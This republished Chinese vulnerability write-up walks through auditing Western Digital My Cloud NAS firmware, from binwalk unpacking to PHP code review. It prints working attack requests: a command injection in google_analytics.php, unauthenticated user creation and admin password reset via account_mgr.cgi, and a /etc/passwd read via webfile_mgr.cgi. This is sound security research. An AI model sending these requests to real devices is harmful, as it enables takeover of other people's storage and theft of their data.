php越权执行命令漏洞_【技术分享】动手教你来挖西部数据NAS的漏洞

2023-10-29 09:40

本文主要是介绍php越权执行命令漏洞_【技术分享】动手教你来挖西部数据NAS的漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

85705

作者:朱老黑

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

传送门

前言

前一段时间在某平台上发现了国外安全团队爆出了西部数据NAS产品的80几个漏洞,但是并没有漏洞的详情,正好我司在用的产品中就有西部数据的NAS,于是就有了这篇文章,这里以此文章为基础,更多的人投入到智能硬件的安全研究中(其实更希望有机会和大牛们一起探讨,带我飞)。

分析

对于智能硬件的安全分析一般从其固件开始入手,获取固件的手段主要有以下几种

1、官网获取

2、智能硬件自带的固件备份功能

3、外部能够利用的漏洞进行远程固件备份下载

4、通过拆解设备,读取flash或者TLL连入设备进行固件提取

一些正规的厂商会把该项产品的所有固件都放到官网上供用户下载,西部数据就是其中之一,可以很轻松的从官网下载到对应设备的固件,这里我们的实验设备是西部数据My_Cloud EX2,实际上也就是西部数据NAS产品的乞丐版。。。通过官网我下载了大部分产品的固件,发现即本一致,所以漏洞基本上是通用的。

85705

85705

得到了设备的固件之后也就完成了安全测试之前的准备工作,下面进行安全测试。

首先对其进行端口扫描,nmap端口扫描结果如下

85705

对以上结果分析之后大致可以分析出以下信息。

1、存在两个三个端口对于HTTP进行相应,分别是80、443、49152

2、存在mysql数据库

3、存在8181未知端口

在硬件安全研究的过程中主要以端口为出发点,现在目标已经出现,下面对固件进行分析并进行解包分析。这里我们是用的是binwalk

使用命令

binwalk My_Cloud_KC2A_2.11.157.bin

85705

比较标准的文件,包含uboot和firmware,直接使用-eM命令进行解包,并得到其固件的系统文件

85705

这里需要注意的是这里从固件中提取出来的文件和设备真正运行时的系统结构存在一定的差异。

85705

在apache配置文件中我们找到了其web对应的路径,将其中的源代码拷贝出来,等待载入源代码审计工具中进行审计。

在进行审计之前先其文件和功能结构进行分析,西部数据的 web端功能由php调用系统实现,大致的结构主要如下

85705

其中80和443端口大家应该都比较熟悉,就是http和https的区别,其对应的web文件都是一样的;49152端口对应的是两个xml文件,能够实现的功能仅仅是获取NAS设备的设备信息;8181端口则对应的是西部数据的restsdk服务,本文暂且不进行讨论。

下面我们主要对80端口的代码进行审计分析。将代码拷贝出来并载入代码分析工具,由于是PHP代码,所以审计起来比较方便,因为审计工具比较多。

下面这张图老司机们基本上一眼就能看出来我用的是什么审计工具。。。

85705

自动审计进行大致分析之后基本上找到了很多的危险函数,在经过仔细的分析之后我们大致找到了以下漏洞。

命令执行

越权

任意文件读取

越权操作

基本上通过这一系列漏洞可以通杀大部分的漏洞设备,下面我们详细分析。

google_analytics.php远程命令执行漏洞

在登录系统之后客户端会不断访问服务端的这一文件,并获取相关信息。在对其进行代码分析后发现其中存在危险函数system(),并在执行时能够载入变量。

85705

85705

最重要的是对传入的参数没有进行过滤导致可以任意执行命令,在进行构造后我们就得到了第一个远程命令执行漏洞。

http://192.168.4.110/web/google_analytics.php

post

cmd=set&opt=pv-home | reboot |&arg=

85705

与之相类似的以下文件同样也存在远程命令执行漏洞。

ftp_download.php远程命令执行

ftp_download.php这个文件时NAS产品中基于FTP产品的应用,在国外大牛对西数NAS产品进行分析时也讲到了此文件的认证绕过,居然直接把认证文件给注释掉了。。。,其中最重要的是这个文件中相对应的功能也存在一个远程命令执行漏洞,这就是无需登录,远程命令执行。下面看仔细分析。

85705

在此文件实现对FTP任务的修改时,调用了system()函数执行系统命令,并且对用户输入的参数没有进行过滤,导致命令注入。

85705

在了解了这一漏洞之后我们进行构造,就得到了我们第二个命令执行漏洞。。。

85705

与之相类似的还有很多,这里并没有进行发掘。下面还有两个与和上面相不同的。

这两个文件是CGI文件,我们并没有对其进行逆向,这里只是简单地对其权限进行简单的探讨。

作为一种非常古老的web程序,被大量应用到物联网设备中,因此有很多的物联网设备的问题就是出在此处,比如很多的远程命令执行漏洞

这一些都是由于对CGI脚本的权限控制不当导致的命令执行,同样的这里西部数据NAS产片同样也存在这样的问题。

account_mgr.cgi越权添加用户(无需登录)

这个脚本是对NAS产品的账号进行控制管理,但是其对用户没有做认证,导致可以在没有登录的情况下进行密码修改,至于这里管理员账号的获取,请尝试安装西部数据的客户端,可以使用抓包软件抓取到其与api接口的请求,可以直接获取到所有的设备账号。

85705

在抓包之后对数据包进行构造,成功添加用户。

85705

85705

相对应的数据包

http://192.168.4.110/cgi-bin/account_mgr.cgi

cmd=cgi_user_add&name=test123&pw=MTExMTEx&group=&first_name=111&last_name=111&pw_onoff=1&mail=111%40qq.com&expires_time=

同样的除了添加用户的功能之外,还能够实现对管理员用户密码的修改

account_mgr.cgi越权修改管理员密码(无需登录)

85705

http://192.168.4.110/cgi-bin/account_mgr.cgi

cmd=cgi_modify_account&mtype=3&username=admin&first_name=111&last_name=111&pw=MTIzMTIz&old_pw=&mail=&group=&available1=0&available2=&available3=&available4=&pw_off=&oldMail=&oldName=test123&type=local&expires_time=&admin

还有一些其他的安全问题

webfile_mgr.cgi任意文件读取导致信息泄露

85705

http://192.168.4.110/cgi-bin/webfile_mgr.cgi

提交参数

cmd=cgi_download&path=%2Fetc%2Fpasswd&path1=%2Fetc%2Fpasswd&name=passwd&type=MD+File&browser=f&os=W

总结

西部数据的这些漏洞还是比较典型的,基本主要成因还是代码的编写过则过于松懈,导致很多的漏洞出现,对于这次的NAS产品系列漏洞的产生实际上危害并没有我们想象的那么大,因为西部数据的NAS产品除了经过特殊设置,大部分只能通过同一网段进行访问,所以这就很大程度上减少了其危害程度,只是对于局域网中,这些漏洞足以致命。

欢迎各位大牛带我飞

传送门

这篇关于php越权执行命令漏洞_【技术分享】动手教你来挖西部数据NAS的漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/299802

相关文章

SpringBoot3实现Gzip压缩优化的技术指南

《SpringBoot3实现Gzip压缩优化的技术指南》随着Web应用的用户量和数据量增加,网络带宽和页面加载速度逐渐成为瓶颈,为了减少数据传输量,提高用户体验,我们可以使用Gzip压缩HTTP响应,... 目录1、简述2、配置2.1 添加依赖2.2 配置 Gzip 压缩3、服务端应用4、前端应用4.1 N

Java利用JSONPath操作JSON数据的技术指南

《Java利用JSONPath操作JSON数据的技术指南》JSONPath是一种强大的工具,用于查询和操作JSON数据,类似于SQL的语法,它为处理复杂的JSON数据结构提供了简单且高效... 目录1、简述2、什么是 jsONPath?3、Java 示例3.1 基本查询3.2 过滤查询3.3 递归搜索3.4

Python中随机休眠技术原理与应用详解

《Python中随机休眠技术原理与应用详解》在编程中,让程序暂停执行特定时间是常见需求,当需要引入不确定性时,随机休眠就成为关键技巧,下面我们就来看看Python中随机休眠技术的具体实现与应用吧... 目录引言一、实现原理与基础方法1.1 核心函数解析1.2 基础实现模板1.3 整数版实现二、典型应用场景2

Python解析器安装指南分享(Mac/Windows/Linux)

《Python解析器安装指南分享(Mac/Windows/Linux)》:本文主要介绍Python解析器安装指南(Mac/Windows/Linux),具有很好的参考价值,希望对大家有所帮助,如有... 目NMNkN录1js. 安装包下载1.1 python 下载官网2.核心安装方式3. MACOS 系统安

Java嵌套for循环优化方案分享

《Java嵌套for循环优化方案分享》介绍了Java中嵌套for循环的优化方法,包括减少循环次数、合并循环、使用更高效的数据结构、并行处理、预处理和缓存、算法优化、尽量减少对象创建以及本地变量优化,通... 目录Java 嵌套 for 循环优化方案1. 减少循环次数2. 合并循环3. 使用更高效的数据结构4

Python中常用的四种取整方式分享

《Python中常用的四种取整方式分享》在数据处理和数值计算中,取整操作是非常常见的需求,Python提供了多种取整方式,本文为大家整理了四种常用的方法,希望对大家有所帮助... 目录引言向零取整(Truncate)向下取整(Floor)向上取整(Ceil)四舍五入(Round)四种取整方式的对比综合示例应

linux进程D状态的解决思路分享

《linux进程D状态的解决思路分享》在Linux系统中,进程在内核模式下等待I/O完成时会进入不间断睡眠状态(D状态),这种状态下,进程无法通过普通方式被杀死,本文通过实验模拟了这种状态,并分析了如... 目录1. 问题描述2. 问题分析3. 实验模拟3.1 使用losetup创建一个卷作为pv的磁盘3.

MySQL8.2.0安装教程分享

《MySQL8.2.0安装教程分享》这篇文章详细介绍了如何在Windows系统上安装MySQL数据库软件,包括下载、安装、配置和设置环境变量的步骤... 目录mysql的安装图文1.python访问网址2javascript.点击3.进入Downloads向下滑动4.选择Community Server5.

CentOS系统Maven安装教程分享

《CentOS系统Maven安装教程分享》本文介绍了如何在CentOS系统中安装Maven,并提供了一个简单的实际应用案例,安装Maven需要先安装Java和设置环境变量,Maven可以自动管理项目的... 目录准备工作下载并安装Maven常见问题及解决方法实际应用案例总结Maven是一个流行的项目管理工具

10个Python自动化办公的脚本分享

《10个Python自动化办公的脚本分享》在日常办公中,我们常常会被繁琐、重复的任务占据大量时间,本文为大家分享了10个实用的Python自动化办公案例及源码,希望对大家有所帮助... 目录1. 批量处理 Excel 文件2. 自动发送邮件3. 批量重命名文件4. 数据清洗5. 生成 PPT6. 自动化测试